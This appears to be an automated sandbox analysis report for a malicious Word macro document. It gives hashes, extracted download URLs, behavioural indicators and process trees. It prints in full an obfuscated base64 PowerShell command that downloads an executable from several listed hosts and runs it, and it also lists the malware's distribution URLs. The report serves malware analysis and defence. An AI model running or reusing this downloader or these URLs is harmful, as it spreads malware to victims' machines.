Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 08:50
Static task
static1
Behavioral task
behavioral1
Sample
ed3e0854716882ece0c1a44c1b891e57_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ed3e0854716882ece0c1a44c1b891e57_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ed3e0854716882ece0c1a44c1b891e57_JaffaCakes118.doc
-
Size
150KB
-
MD5
ed3e0854716882ece0c1a44c1b891e57
-
SHA1
3e42aefc0570f57dd65def6d04cd6354a97f8479
-
SHA256
3db5537afa72bac1ad7529d5026dc4962d42b2e6af1cb12235cfc1f8751676b5
-
SHA512
eafa39664388a43066bc95a18e4a5797e55a79a298b8cad95dd5a265f8751627d84ff3ca77728e397abc275f554057869337011fb9d39f1f5950476051215299
-
SSDEEP
1536:mPiRmz80TdayTTtlj8S1PyswwPOhjS8lIAkAkB445TEgrO3jSWAg83tle1ZZ029C:T422TWTogk079THcpOu5UZ+OQ4y/jn
Malware Config
Extracted
http://h2a1.com/uf8vu/U/
http://www.almakaaseb.com/wp-includes/P/
http://theitnconsultant.com/wp-includes/t/
http://carstarai.com/icon/D/
http://bug.chihuahuamediaprojects.com/wp-includes/u/
https://aecc.dev.caveim.net/wp-admin/dZ/
http://phimsex.2xxhub.com/wp-content/esp/5ur8drbma/6qH/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3004 2800 POwersheLL.exe 30 -
Blocklisted process makes network request 4 IoCs
flow pid Process 5 3004 POwersheLL.exe 6 3004 POwersheLL.exe 7 3004 POwersheLL.exe 9 3004 POwersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{217E528A-7382-49E4-8932-6E59C8DA821E}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2548 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3004 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3004 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2548 WINWORD.EXE 2548 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2548 wrote to memory of 1808 2548 WINWORD.EXE 35 PID 2548 wrote to memory of 1808 2548 WINWORD.EXE 35 PID 2548 wrote to memory of 1808 2548 WINWORD.EXE 35 PID 2548 wrote to memory of 1808 2548 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed3e0854716882ece0c1a44c1b891e57_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABFADUAZQA4AG0AcAA4AD0AKAAoACcAUQB2ACcAKwAnAHIAJwApACsAKAAnADkAZwAnACsAJwBxAGcAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBFAFIAUAByAG8AZgBpAEwARQBcAEUAWAB5AGEAcwA2ADgAXABYAF8AWABFADAAOABfAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAGUAQwB0AE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAGAAUgBgAGkAVABZAGAAUAByAG8AVABgAG8AQwBvAGwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAxADIALAAnACsAJwAgAHQAJwArACcAbAAnACkAKwAnAHMAJwArACgAJwAxADEALAAnACsAJwAgACcAKQArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQAWQBiADQAeAAwADgANAAgAD0AIAAoACcAUQAnACsAKAAnAGkAYwAnACsAJwB4AHIAJwApACsAKAAnAGUAJwArACcAegBjACcAKQApADsAJABLAGQAdABpAG4AeABiAD0AKAAoACcAQQAnACsAJwBxAGYAMwA4ACcAKQArACcANAAnACsAJwAzACcAKQA7ACQAWQB3AG0AXwB0ADYAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAJwArACcAfQBFACcAKwAnAHgAeQAnACsAJwBhAHMANgA4AHsAMAB9AFgAXwB4AGUAJwArACcAMAAnACsAJwA4AF8AewAwACcAKwAnAH0AJwApAC0AZgAgACAAWwBjAGgAQQBSAF0AOQAyACkAKwAkAFkAYgA0AHgAMAA4ADQAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABNAG8AOABuAF8ANABxAD0AKAAoACcAQgAnACsAJwBzADIANgAnACkAKwAoACcAbQBsACcAKwAnAGIAJwApACkAOwAkAFkAbABfAGMAcwB6AG8APQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAGIAQwBMAEkAZQBuAHQAOwAkAEEAZQBnAHAAXwAwAGMAPQAoACcAaAB0ACcAKwAnAHQAcAAnACsAKAAnADoALwAvAGgAJwArACcAMgBhADEALgBjAG8AJwArACcAbQAvAHUAJwArACcAZgAnACsAJwA4AHYAdQAnACsAJwAvACcAKQArACcAVQAvACcAKwAoACcAKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcALgBhACcAKQArACgAJwBsAG0AJwArACcAYQBrACcAKQArACcAYQAnACsAKAAnAGEAcwBlACcAKwAnAGIALgBjACcAKwAnAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBpAG4AYwBsACcAKwAnAHUAZAAnACsAJwBlAHMALwBQAC8AKgBoAHQAdAAnACkAKwAnAHAAJwArACcAOgAnACsAKAAnAC8AJwArACcALwB0ACcAKQArACcAaAAnACsAJwBlACcAKwAnAGkAJwArACgAJwB0AG4AYwAnACsAJwBvAG4AJwApACsAKAAnAHMAdQBsAHQAJwArACcAYQBuAHQAJwArACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AdwAnACsAKAAnAHAALQBpACcAKwAnAG4AYwBsACcAKQArACgAJwB1ACcAKwAnAGQAZQBzAC8AJwApACsAKAAnAHQAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwADoAJwApACsAJwAvACcAKwAnAC8AYwAnACsAKAAnAGEAcgBzACcAKwAnAHQAYQByAGEAJwApACsAKAAnAGkALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAGkAYwBvAG4ALwBEACcAKQArACgAJwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwBiACcAKwAnAHUAZwAuACcAKQArACgAJwBjAGgAJwArACcAaQBoAHUAYQAnACsAJwBoAHUAJwApACsAKAAnAGEAbQBlAGQAaQBhACcAKwAnAHAAcgAnACsAJwBvAGoAZQBjAHQAcwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAKAAnAGkAbgBjAGwAdQBkAGUAcwAvACcAKwAnAHUALwAqAGgAJwArACcAdAAnACkAKwAoACcAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AYQBlACcAKwAnAGMAYwAuAGQAZQB2AC4AYwBhAHYAJwApACsAKAAnAGUAJwArACcAaQBtACcAKQArACgAJwAuAG4AZQAnACsAJwB0AC8AdwBwAC0AJwApACsAJwBhAGQAJwArACcAbQAnACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGQAWgAnACkAKwAnAC8AJwArACgAJwAqAGgAJwArACcAdAAnACkAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAHAAaABpAG0AcwBlACcAKQArACgAJwB4AC4AMgAnACsAJwB4AHgAaAB1ACcAKwAnAGIALgAnACsAJwBjAG8AbQAvAHcAcAAtACcAKwAnAGMAJwApACsAJwBvACcAKwAnAG4AdAAnACsAKAAnAGUAbgB0AC8AZQAnACsAJwBzACcAKQArACgAJwBwAC8ANQB1AHIAOABkACcAKwAnAHIAYgBtACcAKwAnAGEALwAnACkAKwAnADYAcQAnACsAJwBIAC8AJwApAC4AIgBzAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEIAaAAwAGwAbwA5AGoAPQAoACgAJwBMADYAZgAnACsAJwBfAGEANAAnACkAKwAnADEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATQBwAG8AaQBrAGUAZgAgAGkAbgAgACQAQQBlAGcAcABfADAAYwApAHsAdAByAHkAewAkAFkAbABfAGMAcwB6AG8ALgAiAGQATwBXAG4AYABMAG8AYABBAGAARABGAGkATABFACIAKAAkAE0AcABvAGkAawBlAGYALAAgACQAWQB3AG0AXwB0ADYAcgApADsAJABJADkAYQAyADMAMQAxAD0AKAAnAFEAJwArACgAJwB6AGcAJwArACcANwA4AGgAMQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABZAHcAbQBfAHQANgByACkALgAiAEwAZQBOAGAAZwB0AGgAIgAgAC0AZwBlACAAMwAzADkAOQA3ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAKAAkAFkAdwBtAF8AdAA2AHIAKQA7ACQAQQAxADEANgBxAGwAdAA9ACgAKAAnAFoAOQBlAHgAJwArACcAcgAnACkAKwAnADQAagAnACkAOwBiAHIAZQBhAGsAOwAkAEgAdABwAGwAbABuAG0APQAoACcASgB6ACcAKwAoACcAegAnACsAJwAzAG4AJwApACsAJwBiAGkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAHUAYQBjAGEAdgA2AD0AKAAnAE0AJwArACgAJwB3ADQAMwAnACsAJwB3ACcAKwAnADAAZgAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD50c3cbc862b9baa9876a22b2ee9e55370
SHA11d2583e9312c2de5132f082662c5727ca4e82656
SHA2567bba7277935588c40715a326e80223530ea94b035493b9a2a01fcee90d4b2700
SHA512e901a45856fe73e16dbbf64e83a543ece189f8b1cdb94957d562e0dc545d75e1adbc81fa9df61cb2d3d7f9657cac4013a09b2ef750542e6662ba5e915dd033df